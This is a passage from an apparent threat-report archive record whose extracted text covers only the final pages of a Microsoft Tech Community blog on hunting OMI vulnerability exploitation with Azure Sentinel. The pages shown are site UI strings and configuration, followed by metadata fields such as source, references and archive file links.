this\r\ntopic\",\"repliesTurnedOff.TKB\":\"Comments are turned off for this topic\",\"repliesTurnedOff.IDEA\":\"Comments are turned\r\noff for this topic\",\"repliesTurnedOff.OCCASION\":\"Comments are turned off for this topic\",\"infoText\":\"Stop poking\r\nme!\"},\"localOverride\":false},\"CachedAsset:text:en_US-components/community/NavbarDropdownToggle-1775111751222\":{\"__typename\":\"CachedAsset\",\"id\":\"text:en_US-components/community/NavbarDropdownToggle-1775111751222\",\"value\":{\"ariaLabelClosed\":\"Press the down arrow to open the\r\nmenu\"},\"localOverride\":false},\"CachedAsset:text:en_US-components/messages/MessageCoverImage-1775111751222\":\r\n{\"__typename\":\"CachedAsset\",\"id\":\"text:en_US-components/messages/MessageCoverImage-1775111751222\",\"value\":\r\n{\"coverImageTitle\":\"Cover Image\"},\"localOverride\":false},\"CachedAsset:text:en_US-https://techcommunity.microsoft.com/t5/azure-sentinel/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093\r\nPage 36 of 38\n\nshared/client/components/nodes/NodeTitle-1775111751222\":{\"__typename\":\"CachedAsset\",\"id\":\"text:en_US-shared/client/components/nodes/NodeTitle-1775111751222\",\"value\":{\"nodeTitle\":\"{nodeTitle, select, community\r\n{Community} other {{nodeTitle}}} \"},\"localOverride\":false},\"CachedAsset:text:en_US-components/messages/MessageTimeToRead-1775111751222\":{\"__typename\":\"CachedAsset\",\"id\":\"text:en_US-components/messages/MessageTimeToRead-1775111751222\",\"value\":{\"minReadText\":\"{min} MIN\r\nREAD\"},\"localOverride\":false},\"CachedAsset:text:en_US-components/messages/MessageSubject-1775111751222\":\r\n{\"__typename\":\"CachedAsset\",\"id\":\"text:en_US-components/messages/MessageSubject-1775111751222\",\"value\":\r\n{\"noSubject\":\"(no subject)\"},\"localOverride\":false},\"CachedAsset:text:en_US-components/users/UserLink-1775111751222\":{\"__typename\":\"CachedAsset\",\"id\":\"text:en_US-components/users/UserLink-1775111751222\",\"value\":\r\n{\"authorName\":\"View Profile: {author}\",\"anonymous\":\"Anonymous\",\"ariaLabel.rank\":\"Rank:\r\n{rankName}\"},\"localOverride\":false},\"CachedAsset:text:en_US-shared/client/components/users/UserRank-1775111751222\":{\"__typename\":\"CachedAsset\",\"id\":\"text:en_US-shared/client/components/users/UserRank-1775111751222\",\"value\":{\"rankName\":\"{rankName}\",\"userRank\":\"Author rank\r\n{rankName}\"},\"localOverride\":false},\"CachedAsset:text:en_US-components/messages/MessageTime-1775111751222\":\r\n{\"__typename\":\"CachedAsset\",\"id\":\"text:en_US-components/messages/MessageTime-1775111751222\",\"value\":\r\n{\"postTime\":\"Published: {time}\",\"lastPublishTime\":\"Last Update: {time}\",\"conversation.lastPostingActivityTime\":\"Last\r\nposting activity time: {time}\",\"conversation.lastPostTime\":\"Last post time: {time}\",\"moderationData.rejectTime\":\"Rejected\r\ntime: {time}\"},\"localOverride\":false},\"CachedAsset:text:en_US-components/messages/MessageBody-1775111751222\":\r\n{\"__typename\":\"CachedAsset\",\"id\":\"text:en_US-components/messages/MessageBody-1775111751222\",\"value\":\r\n{\"showMessageBody\":\"Show More\",\"mentionsErrorTitle\":\"{mentionsType, select, board {Board} user {User} message\r\n{Message} other {}} No Longer Available\",\"mentionsErrorMessage\":\"The {mentionsType} you are trying to view has been\r\nremoved from the community.\",\"videoProcessing\":\"Video is being processed. Please try again in a few\r\nminutes.\",\"bannerTitle\":\"Video provider requires cookies to play the video. Accept to continue or {url} it directly on the\r\nprovider's site.\",\"buttonTitle\":\"Accept\",\"urlText\":\"watch\"},\"localOverride\":false},\"CachedAsset:text:en_US-components/messages/MessageCustomFields-1775111751222\":{\"__typename\":\"CachedAsset\",\"id\":\"text:en_US-components/messages/MessageCustomFields-1775111751222\",\"value\":{\"CustomField.default.label\":\"Value of\r\n{name}\"},\"localOverride\":false},\"CachedAsset:text:en_US-components/messages/MessageRevision-1775111751222\":\r\n{\"__typename\":\"CachedAsset\",\"id\":\"text:en_US-components/messages/MessageRevision-1775111751222\",\"value\":\r\n{\"lastUpdatedDatePublished\":\"{publishCount, plural, one{Published} other{Updated}}\r\n{date}\",\"lastUpdatedDateDraft\":\"Created {date}\",\"version\":\"Version {major}.\r\n{minor}\"},\"localOverride\":false},\"CachedAsset:text:en_US-shared/client/components/common/QueryHandler-1775111751222\":{\"__typename\":\"CachedAsset\",\"id\":\"text:en_US-shared/client/components/common/QueryHandler-1775111751222\",\"value\":{\"title\":\"Query Handler\"},\"localOverride\":false},\"CachedAsset:text:en_US-components/tags/TagList-1775111751222\":{\"__typename\":\"CachedAsset\",\"id\":\"text:en_US-components/tags/TagList-1775111751222\",\"value\":{\"showMoreFor\":\"Show more for {title}\"},\"localOverride\":false},\"CachedAsset:text:en_US-components/messages/MessageReplyButton-1775111751222\":{\"__typename\":\"CachedAsset\",\"id\":\"text:en_US-components/messages/MessageReplyButton-1775111751222\",\"value\":{\"repliesCount\":\"\r\n{count}\",\"title\":\"Reply\",\"title@board:BLOG@message:root\":\"Comment\",\"title@board:TKB@message:root\":\"Comment\",\"title@board:IDEA@message:\r\ncomponents/messages/MessageAuthorBio-1775111751222\":{\"__typename\":\"CachedAsset\",\"id\":\"text:en_US-components/messages/MessageAuthorBio-1775111751222\",\"value\":{\"sendMessage\":\"Send\r\nMessage\",\"actionMessage\":\"Follow this blog board to get notified when there's new activity\",\"coAuthor\":\"CO-PUBLISHER\",\"contributor\":\"CONTRIBUTOR\",\"userProfile\":\"View Profile\",\"iconlink\":\"Go to {name}\r\n{type}\"},\"localOverride\":false},\"CachedAsset:text:en_US-shared/client/components/users/UserAvatar-1775111751222\":\r\n{\"__typename\":\"CachedAsset\",\"id\":\"text:en_US-shared/client/components/users/UserAvatar-1775111751222\",\"value\":\r\n{\"altText\":\"{login}'s avatar\",\"altTextGeneric\":\"User's avatar\"},\"localOverride\":false},\"CachedAsset:text:en_US-shared/client/components/ranks/UserRankLabel-1775111751222\":{\"__typename\":\"CachedAsset\",\"id\":\"text:en_US-shared/client/components/ranks/UserRankLabel-1775111751222\",\"value\":{\"altTitle\":\"Icon for {rankName}\r\nrank\"},\"localOverride\":false},\"CachedAsset:text:en_US-components/tags/TagView/TagViewChip-1775111751222\":\r\n{\"__typename\":\"CachedAsset\",\"id\":\"text:en_US-components/tags/TagView/TagViewChip-1775111751222\",\"value\":\r\n{\"tagLabelName\":\"Tag name {tagName}\"},\"localOverride\":false},\"CachedAsset:text:en_US-components/users/UserRegistrationDate-1775111751222\":{\"__typename\":\"CachedAsset\",\"id\":\"text:en_US-components/users/UserRegistrationDate-1775111751222\",\"value\":{\"noPrefix\":\"{date}\",\"withPrefix\":\"Joined\r\n{date}\"},\"localOverride\":false},\"CachedAsset:text:en_US-shared/client/components/nodes/NodeAvatar-1775111751222\":\r\n{\"__typename\":\"CachedAsset\",\"id\":\"text:en_US-shared/client/components/nodes/NodeAvatar-1775111751222\",\"value\":\r\n{\"altTitle\":\"Node avatar for {nodeTitle}\"},\"localOverride\":false},\"CachedAsset:text:en_US-shared/client/components/nodes/NodeDescription-1775111751222\":{\"__typename\":\"CachedAsset\",\"id\":\"text:en_US-shared/client/components/nodes/NodeDescription-1775111751222\",\"value\":{\"description\":\"\r\n{description}\"},\"localOverride\":false},\"CachedAsset:text:en_US-shared/client/components/nodes/NodeIcon-1775111751222\":{\"__typename\":\"CachedAsset\",\"id\":\"text:en_US-shared/client/components/nodes/NodeIcon-1775111751222\",\"value\":{\"contentType\":\"Content Type {style, select, FORUM {Forum} BLOG {Blog} TKB {Knowledge\r\nBase} IDEA {Ideas} OCCASION {Events} other {}}\r\nicon\"},\"localOverride\":false}}}},\"page\":\"/blogs/BlogMessagePage/BlogMessagePage\",\"query\":\r\n{\"boardId\":\"microsoftsentinelblog\",\"messageSubject\":\"hunting-for-omi-vulnerability-exploitation-with-azure-sentinel\",\"messageId\":\"2764093\"},\"buildId\":\"VXuOn2D5MfObWEiRanLQ9\",\"runtimeConfig\":\r\nhttps://techcommunity.microsoft.com/t5/azure-sentinel/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093\r\nPage 37 of 38\n\n{\"buildInformationVisible\":false,\"logLevelApp\":\"info\",\"logLevelMetrics\":\"info\",\"surveysEnabled\":true,\"openTelemetry\":\r\n{\"clientEnabled\":false,\"configName\":\"o365\",\"serviceVersion\":\"26.1.0\",\"universe\":\"prod\",\"collector\":\"http://localhost:4318\",\"logLevel\":\"error\",\"routeCha\r\n[\"components_community_Navbar_NavbarWidget\",\"components_community_Breadcrumb_BreadcrumbWidget\",\"components_customComponent_Custo\r\n[{\"id\":\"analytics\",\"src\":\"https://techcommunity.microsoft.com/t5/s/gxcuf89792/pagescripts/1751476272000/analytics.js?\r\npage.id=BlogMessagePage\u0026entity.id=board%3Amicrosoftsentinelblog\u0026entity.id=message%3A2764093\",\"strategy\":\"afterInteractive\"}]}\r\nSource: https://techcommunity.microsoft.com/t5/azure-sentinel/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093\r\nhttps://techcommunity.microsoft.com/t5/azure-sentinel/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093\r\nPage 38 of 38",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://techcommunity.microsoft.com/t5/azure-sentinel/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093"
	],
	"report_names": [
		"2764093"
	],
	"threat_actors": [],
	"ts_created_at": 1775439029,
	"ts_updated_at": 1775791244,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/24e45f419cf7fb1521dd57c704036b0e68a2f72e.pdf",
		"text": "https://archive.orkl.eu/24e45f419cf7fb1521dd57c704036b0e68a2f72e.txt",
		"img": "https://archive.orkl.eu/24e45f419cf7fb1521dd57c704036b0e68a2f72e.jpg"
	}
}